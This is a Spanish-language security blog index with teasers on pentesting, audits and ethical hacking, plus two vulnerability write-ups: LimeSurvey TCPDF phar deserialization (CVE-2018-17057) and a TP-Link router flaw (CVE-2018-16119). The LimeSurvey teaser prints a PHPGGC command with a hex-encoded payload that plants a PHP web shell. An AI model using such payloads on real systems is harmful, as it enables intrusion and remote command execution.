Cómo proteger tu empresa de los riesgos de ciberseguridad en México

En la era digital, la ciberseguridad es un tema crítico para todas las empresas. México no es una excepción, ya que los ciberdelincuentes han aumentado sus actividades en el país en los últimos años. Esta guía cubre la ciberseguridad de México con datos históricos, buenas prácticas, consejos y todo lo necesario para educar a las empresas sobre la protección de sus datos y sistemas.

Read more

Test de penetración: ¿Cada cuánto tiempo se debería realizar y en qué áreas?

Un test de penetración o pentest es una prueba de seguridad que simula un ataque de hackers al sistema para identificar vulnerabilidades y detectar posibles amenazas. Esto permite a los responsables de seguridad tomar medidas para protegerse frente a ataques cibernéticos. 

Read more

Ejecución remota de código en LimeSurvey < 3.16 mediante ataque de serialización en TCPDF

Durante el Black Hat USA 2018, Sam Thomas presentó otra forma de explotar ataques de serialización en PHP. No es mi intención explicar esta técnica con demasiado detalle. Para más información puedes acceder al siguiente enlace PHP Unserialization Vulnerability Jim, but Not as We Know It.

Esta técnica de explotación se llama Unserialization via the phar:// Stream Wrapper, un archivo PHAR puede contener metadatos. Pueden ser incluso un objeto PHP serializado. Existen ciertas funciones PHP como: fopen(), file_exists(), copy(), filesize(), etc, que soportan el uso del phar://, cuando estas funciones realizan una llamada a un fichero PHAR mediante este wrapper, los metadatos del fichero son deserializados, esto permite la inyección de objetos maliciosos sin necesidad de controlar una función unserialize().

Requisitos

Controlar la entrada de cualquiera de estas funciones vulnerables:

  • archivo_existe()
  • fopen()
  • tamaño del archivo()
  • copiar()
  • incluir()
  • etc

Estas funciones vulnerables son utilizadas para poder subir un archivo de tipo PHAR al servidor. Junto con esta técnica, se reportaron diferentes CVE, uno de los cuales es CVE-2018-17057, el cual  describe una vulnerabilidad de deserialización en la biblioteca TCPDF.

TCPDF

Es una biblioteca de código abierto escrita en PHP que permite generar documentos PDF. Cuando se genera un documento PDF a partir de código HTML, es posible controlar la entrada de la función file_exists(), mediante la etiqueta <img>.

Serializacion-en-TCPDF

LimeSurvey <3.16 utiliza una versión antigua (6.2.13) de la librería TCPDF que es vulnerable a un ataque de deserialización a través del wrapper phar://. Recuerda que para explotar esta vulnerabilidad es necesario disponer de una cuenta de usuario administrador en la aplicación vulnerable.

¿Cómo se obtiene el RCE?

Cuando la exportación de una Encuesta se realiza a través de la opción “queXML PDF export”, es posible insertar código HTML dentro del campo de estilo y controlar la entrada de la función file_exists() dentro de la librería TCPDF. Te mostramos un ejemplo: 

PHPGGC

Es una herramienta que permite generar “gadgets” sobre diferentes Frameworks PHP, es decir, si la aplicación está utilizando uno de los frameworks de la lista soportada, es muy posible que podamos generar un payload para conseguir comandos en la aplicación vulnerable. Por suerte, LimeSurvey utiliza el Framework PHP Yii para manejar las peticiones HTTP, por lo que es posible generar un payload válido de la siguiente manera:

$ ./phpggc Yii/RCE1 system "echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | xxd -r -p > shell.php" -p phar -o /tmp/exploit.jpg

Read more

10 mejores prácticas para la prevención de intrusiones en Chile

Las intrusiones son acciones maliciosas realizadas por hackers o ciberdelincuentes que buscan vulnerar la seguridad de una computadora o sistema informático. En Chile, estas acciones maliciosas son cada vez más comunes. Por lo tanto, es importante tomar medidas para prevenir los ataques de intrusión. 

Read more

5 pasos para realizar una Auditoría de Seguridad Cibernética en tu Empresa

La seguridad cibernética es una preocupación para muchas empresas en un mundo cada vez más digital. Esta guía te ayudará a llevar a cabo una auditoría de seguridad en tu empresa para asegurar la protección de tus datos y activos.

Read more

¿Cuál es la diferencia entre un escaneo de vulnerabilidades y un Ethical Hacking?

En la actualidad, la ciberseguridad es una de las principales preocupaciones para todas las empresas, especialmente a medida que los ataques cibernéticos se vuelven cada vez más sofisticados. Por lo tanto, es importante que las organizaciones se preocupen por la seguridad de sus sistemas informáticos. Una forma de hacerlo es a través de un escaneo de vulnerabilidades o un Ethical Hacking. 

Read more

Explotando Routers: Otro TP-Link 0-Day

En este post se hablará sobre el hallazgo (CVE-2018-16119) mientras se realiza una investigación de vulnerabilidades en un router doméstico: El router WiFi doméstico WR1043ND de TP-Link. 

Te presentamos los pasos para identificar la vulnerabilidad y cómo se puede explotar para obtener la ejecución remota de código en el dispositivo.

El dispositivo

El dispositivo en el que se realizó  esta investigación fue el router WiFi doméstico WR1043ND de TP-Link (versión de firmware 3.00).

Se empezó hacer un Pentest clásico de aplicaciones web buscando vulnerabilidades comunes en la interfaz de administración del dispositivo. La contraseña por defecto para acceder al panel de administración era admin:admin

No se encontró nada interesante alrededor de los componentes por defecto de los dispositivos, pero este dispositivo tiene una funcionalidad realmente curiosa. Cualquier propietario del dispositivo podría conectar un dispositivo externo al Router y habilitar las capacidades NAS-Kind del dispositivo, esta es una característica muy interesante y clave en la campaña de comercialización del producto de TP-Link y se puede ver en la página web del producto: https://www.tp-link.com/au/products/details/cat-9_TL-WR1043ND.html

Una vez conectado un dispositivo externo a través del puerto USB se puede utilizar la funcionalidad de Servidor Multimedia para crear y compartir carpetas/archivos a través de la Red Interna.

Cuando el dispositivo creaba una nueva carpeta, se enviaba la siguiente solicitud:

GET /TLROLZZBRWGYNWBA/userRpm/MediaServerFoldersCfgRpm.htm?displayName=testing_folder&shareEntire=%2Ftmp%2Fusbdisk%2Fvolume1&no_use_para_just_fix_ie_sub_bug=&Save=Save HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.1/TLROLZZBRWGYNWBA/userRpm/MediaServerFoldersCfgRpm.htm Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D Connection: close Upgrade-Insecure-Requests: 1

Read more

Entrenamiento de Hacking Ético: 10 maneras de aprender en línea

Los hackers éticos han estado creciendo en popularidad en los últimos años como una forma de ayudar a empresas y gobiernos a mejorar la seguridad de sus sistemas informáticos. Si estás interesado en convertirte en un hacker ético, debes iniciar sabiendo cuál es la verdadera función de un Hacking Ético, siendo aquella persona que emplea estos conocimientos que tiene sobre piratería y vulnerabilidades en los sistemas informáticos para prevenir y arreglar ataques maliciosos por parte de otros piratas. Se debe tener en cuenta que tiene muchas connotaciones negativas, pero no es así en el caso del hacking ético.

Read more

¿Qué es la auditoría de seguridad?

La auditoría de seguridad es un proceso estandarizado destinado a verificar que los sistemas informáticos y la información almacenada en los mismos cumplan con los estándares de seguridad requeridos. Esto significa comprobar que los sistemas estén protegidos contra vulnerabilidades y amenazas, lo que permite garantizar que los datos almacenados se mantengan seguros. 

Read more

Backed by

Hackmetrix startup chile